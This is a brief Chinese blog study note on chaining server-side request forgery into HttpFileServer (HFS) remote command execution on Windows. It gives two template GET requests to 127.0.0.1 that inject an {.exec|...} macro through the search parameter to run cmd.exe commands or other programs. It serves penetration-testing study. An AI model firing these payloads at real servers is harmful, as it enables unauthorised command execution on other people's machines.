57uv6Z6g55qE5Y2a5a6i

MS4wLjABAAAA5qMD8Gzdcgq7HXUOviKB59i0-ybJ59jJvNzyaPt5XOsVNqP6DU7WLcoAXvdxvYdp💗
本站所有文章仅作技术研究，请勿非法破坏，请遵守相关法律法规，后果自负

【笔记】HFS服务端请求伪造

发表于 2024-05-13 更新于 2025-12-19 阅读次数：

前言

HFS服务端请求伪造

准备工作

当前服务器的网络内有HFS服务
当前网站有SSRF服务端请求伪造漏洞

正文

Windows

执行CMD命令

<cmd>：命令

request

1	GET http://127.0.0.1:80/?search==%00{.exec\|cmd.exe <cmd>.}

运行其他程序

<file>.exe：其他程序

request

1	GET http://127.0.0.1:80/?search==%00{.exec\|<file>.exe.}

完成

参考文献

哔哩哔哩——xiaodisec

0%